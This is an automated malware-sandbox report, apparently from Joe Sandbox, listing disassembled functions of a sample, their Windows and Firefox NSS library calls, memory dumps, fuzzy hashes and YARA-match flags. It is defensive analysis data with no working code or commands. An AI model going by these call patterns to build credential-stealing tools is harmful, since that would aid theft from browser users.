Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: K11_$DoesMechanism$Free
String ID:
API String ID: 3860933388-0
Opcode ID: c0ea7aa5b8a9f32bb43e634e32dbf66d6d9abe63a5713f45df587d220ff0a33d
Instruction ID: d699b138e2bdb21134855f04b8305a06dc1032c1a05a1cf99fcd83d797b996a9
Opcode Fuzzy Hash: c0ea7aa5b8a9f32bb43e634e32dbf66d6d9abe63a5713f45df587d220ff0a33d
Instruction Fuzzy Hash: CB4152B570120BAFDB01AF69DD809AB77B9EF18348B440434ED48D7710E732E925DBA2

Function 00410FC0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00410FE8
strtok_s.MSVCRT ref: 0041112D

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02D3E158,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 12718380cc8345dd1134cdc0a4b92b8547c455f1d71d35516555b288052ce2dc
Instruction ID: 03db8a1056b7d3decc043d16849240f9eafe82692520a9407f7f8401fd2e2a69
Opcode Fuzzy Hash: 12718380cc8345dd1134cdc0a4b92b8547c455f1d71d35516555b288052ce2dc
Instruction Fuzzy Hash: EF515E75A0410AEFCB08CF54D595AEEBBB5FF48308F10805EE9029B361D734EA91CB95

Function 6D012460 Relevance: 7.6, APIs: 5, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,6D0B7379,00000002,?), ref: 6D012493
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6D0124B4
PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6D0B7379,00000002,?), ref: 6D0124EA
PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6D0B7379,00000002,?), ref: 6D0124F5
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6D0B7379,00000002,?), ref: 6D0124FE

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Error$Alloc_FreeK11_Utilfree
String ID:
API String ID: 2595244113-0
Opcode ID: 6f2dedc53230b06152a6466a991bf2775fa0bfc94da0d69c223724f1b5a4ac97
Instruction ID: af9e3ddfc3e572519597ef3bd9ee36277e360ce0f95c10f35d30a3023c9409ef
Opcode Fuzzy Hash: 6f2dedc53230b06152a6466a991bf2775fa0bfc94da0d69c223724f1b5a4ac97
Instruction Fuzzy Hash: F631AF71A04126ABFB208FA4DC42BBFB7A4EF4A308F014125FE1596290EB34D994C7A1

Function 6D018530 Relevance: 7.6, APIs: 5, Instructions: 103COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6D018549
TlsGetValue.KERNEL32 ref: 6D0185CF
TlsGetValue.KERNEL32 ref: 6D0185FE
TlsGetValue.KERNEL32 ref: 6D018629
memcpy.VCRUNTIME140 ref: 6D018655

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Value$IdentitiesLayermemcpy
String ID:
API String ID: 2311246771-0
Opcode ID: 953e43f03cb2c07d045698bb3bb76328057b85f4670955af0ee093f17e0de6c9
Instruction ID: b3e73262a79a58b3e6048d2602abfb252aa70d784b65c1b5a5439cfd5a73a754
Opcode Fuzzy Hash: 953e43f03cb2c07d045698bb3bb76328057b85f4670955af0ee093f17e0de6c9
Instruction Fuzzy Hash: BA4181B0508702DBFB119FB8D94476ABBF4FF45304F41862ED99887261EB309584CB92

Function 6CF7EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CF7EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6CF7EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CF7EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CF7EEEB
free.MOZGLUE(?), ref: 6CF7EEF6

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 2c19519f8d911a94a2dc9a1090f1ae40f7f51b6ea1cc904054e0ff53b974002e
Instruction ID: 7812267e8ec0d737160f538849fc0b4edab8f364d4c8c4395f33916e7dd96909
Opcode Fuzzy Hash: 2c19519f8d911a94a2dc9a1090f1ae40f7f51b6ea1cc904054e0ff53b974002e
Instruction Fuzzy Hash: 6231D2715002019FEB309F28EC41BE67BB4FB4A714F160A2BE95A87A51DB31E814CBE1

Function 6D09A530 Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6D09A55C
PR_IntervalNow.NSS3 ref: 6D09A573
PR_IntervalNow.NSS3 ref: 6D09A5A5
_PR_MD_UNLOCK.NSS3(?), ref: 6D09A603

Part of subcall function 6D049890: TlsGetValue.KERNEL32(?,?,?,6D0497EB), ref: 6D04989E

_PR_MD_UNLOCK.NSS3(?), ref: 6D09A636

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Interval$CriticalEnterSectionValue
String ID:
API String ID: 959321092-0
Opcode ID: a5713b354845b948975148b1accfc4f6e3236fd8a1297200916455f475726486
Instruction ID: 3b01e104bf7f6df1eb0e24498ff3fa2a8a2d34ade9f204345d7ae471d8bbafc0
Opcode Fuzzy Hash: a5713b354845b948975148b1accfc4f6e3236fd8a1297200916455f475726486
Instruction Fuzzy Hash: 9F313EB1A04606DFEB00DF29D484F6AB7E5FF48365B258579D9158F216D730E880CB90

Function 6CFA86D0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFA8716
TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFA8727
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CFA873B
PR_Unlock.NSS3(?), ref: 6CFA876F
PR_SetError.NSS3(00000000,00000000), ref: 6CFA8787

Part of subcall function 6CFA79F0: memcpy.VCRUNTIME140(?,6D0AAB28,000000FC), ref: 6CFA7A1E
Part of subcall function 6CFA79F0: PR_SetError.NSS3(FFFFE001,00000000), ref: 6CFA7A48

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Error$AuthenticateCriticalEnterK11_SectionUnlockValuememcpy
String ID:
API String ID: 3710639568-0
Opcode ID: d5c192b1f00f8021f7df608df477a169a501f25c2dfeb0ff2f68096097b6d403
Instruction ID: c989c01cd7ec0a1121e135233b8629a70272127cf1173fd308664b852aae6260
Opcode Fuzzy Hash: d5c192b1f00f8021f7df608df477a169a501f25c2dfeb0ff2f68096097b6d403
Instruction Fuzzy Hash: F9310876900200ABEF009FA4DC41F5ABBB9EF85318F154026FD099B712EB71E955C7A1

Function 6CF844D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3 ref: 6CF844FF

Part of subcall function 6CFE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CF88298,?,?,?,6CF7FCE5,?), ref: 6CFE07BF
Part of subcall function 6CFE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CFE07E6
Part of subcall function 6CFE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFE081B
Part of subcall function 6CFE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFE0825

SECOID_FindOID_Util.NSS3(?), ref: 6CF84524
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CF84537
CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6CF84579

Part of subcall function 6CF841B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6CF841BE
Part of subcall function 6CF841B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CF841E9
Part of subcall function 6CF841B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6CF84227
Part of subcall function 6CF841B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6CF8423D

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF8459C

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
String ID:
API String ID: 3193526912-0
Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction ID: 05235e9a8de6a1bd53a842e4d167243f040fb3520f9387ff9baac9fc1a3177f9
Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction Fuzzy Hash: 4921C1727036009BEB10CE69AC64B6F7FBD9F41658F150428AC15CFAC1EB21E904C6A1

Function 6CF8E5E0 Relevance: 7.6, APIs: 5, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,00000000,00000000,?,6CF8E755,00000000,00000004,?,?), ref: 6CF8E5F5

Part of subcall function 6CFE14C0: TlsGetValue.KERNEL32 ref: 6CFE14E0
Part of subcall function 6CFE14C0: EnterCriticalSection.KERNEL32 ref: 6CFE14F5
Part of subcall function 6CFE14C0: PR_Unlock.NSS3 ref: 6CFE150D

PR_SetError.NSS3(FFFFE005,00000000,?), ref: 6CF8E62C
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000,?), ref: 6CF8E63E

Part of subcall function 6CFDF9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6CF7F379,?,00000000,-00000002), ref: 6CFDF9B7

PK11_HashBuf.NSS3(?,?,?,?,?,?,?,?), ref: 6CF8E65C

Part of subcall function 6CFADDD0: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CFADDEC
Part of subcall function 6CFADDD0: PK11_DigestBegin.NSS3(00000000), ref: 6CFADE70
Part of subcall function 6CFADDD0: PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CFADE83
Part of subcall function 6CFADDD0: HASH_ResultLenByOidTag.NSS3(?), ref: 6CFADE95
Part of subcall function 6CFADDD0: PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CFADEAE
Part of subcall function 6CFADDD0: PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CFADEBB

SECITEM_ZfreeItem_Util.NSS3(00000000,00000000,?), ref: 6CF8E68E

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: K11_Util$Digest$ArenaItem_Mark_$AllocBeginContextCriticalDestroyEnterErrorFinalFindHashResultSectionTag_UnlockValueZfree
String ID:
API String ID: 2865137721-0
Opcode ID: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
Instruction ID: fcd7ba0da600d2ffce75ae0abd0dbb1d23d14cb15bdc6a7ddfd81dbd7320031a
Opcode Fuzzy Hash: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
Instruction Fuzzy Hash: 2621207AB13210AFFB004EA5DC84F6B7BB89F84258F194138ED1987A65EB21DD24C7D1

Function 6CF8AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6CF83FFF,00000000,?,?,?,?,?,6CF81A1C,00000000,00000000), ref: 6CF8ADA7

Part of subcall function 6CFE14C0: TlsGetValue.KERNEL32 ref: 6CFE14E0
Part of subcall function 6CFE14C0: EnterCriticalSection.KERNEL32 ref: 6CFE14F5
Part of subcall function 6CFE14C0: PR_Unlock.NSS3 ref: 6CFE150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CF83FFF,00000000,?,?,?,?,?,6CF81A1C,00000000,00000000), ref: 6CF8ADB4

Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE10F3
Part of subcall function 6CFE10C0: EnterCriticalSection.KERNEL32(?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE110C
Part of subcall function 6CFE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1141
Part of subcall function 6CFE10C0: PR_Unlock.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1182
Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6CF83FFF,?,?,?,?,6CF83FFF,00000000,?,?,?,?,?,6CF81A1C,00000000), ref: 6CF8ADD5

Part of subcall function 6CFDFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CFD8D2D,?,00000000,?), ref: 6CFDFB85
Part of subcall function 6CFDFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CFDFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6D0A94B0,?,?,?,?,?,?,?,?,6CF83FFF,00000000,?), ref: 6CF8ADEC

Part of subcall function 6CFDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0B18D0,?), ref: 6CFDB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF83FFF), ref: 6CF8AE3C

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 96b3a3fecc5e1d4ddfb0bc9c70e3ddfc1fc9ee09cd007c459d86b200009b5d75
Instruction ID: 84f82a5d417f606f5c11f5bc07a2f1c4f494c59477ecb43f05d85c6c931fc853
Opcode Fuzzy Hash: 96b3a3fecc5e1d4ddfb0bc9c70e3ddfc1fc9ee09cd007c459d86b200009b5d75
Instruction Fuzzy Hash: D0112972E013056BF7109B669C40FBF73F8DF5524DF048529ED5996681FB20E95882A2

Function 00416BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,02D3E158,?,004210F4,?,00000000,?), ref: 00416C0C
sscanf.NTDLL ref: 00416C39
SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,02D3E158,?,004210F4), ref: 00416C52
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02D3E158,?,004210F4), ref: 00416C60
ExitProcess.KERNEL32 ref: 00416C7A

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 13c8c9fa11c29c7463f57d05a3204681bb252f3d98e386f97a7767b14633894a
Instruction ID: 1a92bae8d2aea180e7b918fcc5e881d349bf880cfa552010dcbd9d747ca2879d
Opcode Fuzzy Hash: 13c8c9fa11c29c7463f57d05a3204681bb252f3d98e386f97a7767b14633894a
Instruction Fuzzy Hash: 0321CD75D142089BCF14DFE4E9459EEB7BABF48300F04852EF506A3250EB349644CB69

Function 00418950 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
wsprintfA.USER32 ref: 004189E0

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

%dx%d, xrefs: 004189D7
F(t, xrefs: 00418994, 004189A3

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: F(t$%dx%d
API String ID: 2716131235-3934083006
Opcode ID: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
Opcode Fuzzy Hash: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5

Function 6D0104C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6D01461B,-00000004), ref: 6D0104DF
TlsGetValue.KERNEL32(?,00000000,?,6D01461B,-00000004), ref: 6D010510
EnterCriticalSection.KERNEL32(ED850FDC), ref: 6D010520
PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6D01461B,-00000004), ref: 6D010534
GetLastError.KERNEL32(?,6D01461B,-00000004), ref: 6D010543

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
